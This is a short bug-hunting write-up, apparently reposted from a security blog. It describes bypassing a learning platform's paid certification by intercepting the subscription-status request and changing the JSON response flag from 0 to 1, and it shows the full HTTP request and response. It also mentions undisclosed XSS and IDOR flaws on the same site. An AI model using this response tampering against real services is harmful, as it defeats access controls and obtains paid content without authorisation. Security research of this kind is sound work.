Bypassed the subscription and got the certification
2021-11-13 13:58:03 Author: infosecwriteups.com(查看原文) 阅读量:23 收藏

Ramalingasamy

Hey fellow hackers and bug hunter’s,

Yesterday, I was searching for the target .After some time i ended up with the learning platform .For example( test.com ).On entering into the website , there is one tab called certification.In the certification page ,there are lots of courses available.

I saw the Java Programming course and i click the java certification ,It asks to attend the test and i clicked the attend button ,The website shows subscription needed , I was like WTF!!!

All you know What i am going to do now,I intercept the request for attend, The request looks like,

POST /Service/Users.aspx/UserSubscriptionStatus HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: https://www.test.com
Connection: close
Referer: https://www.test.com/certifications/java-programming
Cookie: cookies;

{

UserID:’210125'

}

And the response looks like,

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Sat, 23 Oct 2021 07:21:46 GMT
Connection: close
Content-Length: 9

{“d”:”0"}

Here , What i done was ,Just i changed the d value to “1” and the subscription bypassed and I was like

And more XSS and IDOR vulnerabilities are there in this website,So thats only i can’t disclose the website name.

Follow me for more bug hunting writeup’s

Follow me on Instagram : https://www.instagram.com/ram_0x_infosec/

Connect with me on Linkedin : https://www.linkedin.com/in/ram0xinfosec/


文章来源: https://infosecwriteups.com/bypassed-the-subscription-and-got-the-certification-27c571c2f383?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh